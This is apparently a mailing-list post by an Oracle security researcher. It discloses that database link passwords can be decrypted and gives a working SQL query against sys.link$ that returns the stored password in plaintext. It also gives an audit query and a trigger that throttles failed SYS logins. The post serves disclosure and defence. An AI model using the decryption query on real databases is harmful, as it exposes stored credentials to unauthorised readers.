So, users can decrypt dblink passwords as the key is included in the ciphertext... --> SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK'; NAME -------------------------------------------------------------------------------- USERID ------------------------------ PASSWORD -------------------------------------------------------------------------------- TEST_LINK DBLINK_ACCOUNT MYPW ..one saving grace is that we can now identify incoming db links using this.. select userid, terminal, comment$text from sys.aud$ where comment$text like 'DBLINK%'; USERID NTIMESTAMP# USERHOST COMMENT$TEXT ------------ ----------------- ------- -------------- DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295) -->could be too late though so best to take a few precautions in advance... preferably automated... ..Same with lack of profiles on SYS account. Sometimes easier to fix ourselves.. create or replace trigger sys_throttler.tra_servererror_ora1017 after servererror on database declare l_db_usr varchar2 (32); begin if (ora_is_servererror(1017)) then l_db_usr := upper (trim (sys_context ('userenv', 'authenticated_identity'))); if l_db_usr ='SYS' then dbms_lock.sleep (1); else NULL; end if; end if; end tra_servererror_ora1017; / More like this at UKOUG Monday, if you are in the area... Cheers, Paul M. Wright http://www.oraclesecurity.com http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62 -- //www.freelists.org/webpage/oracle-l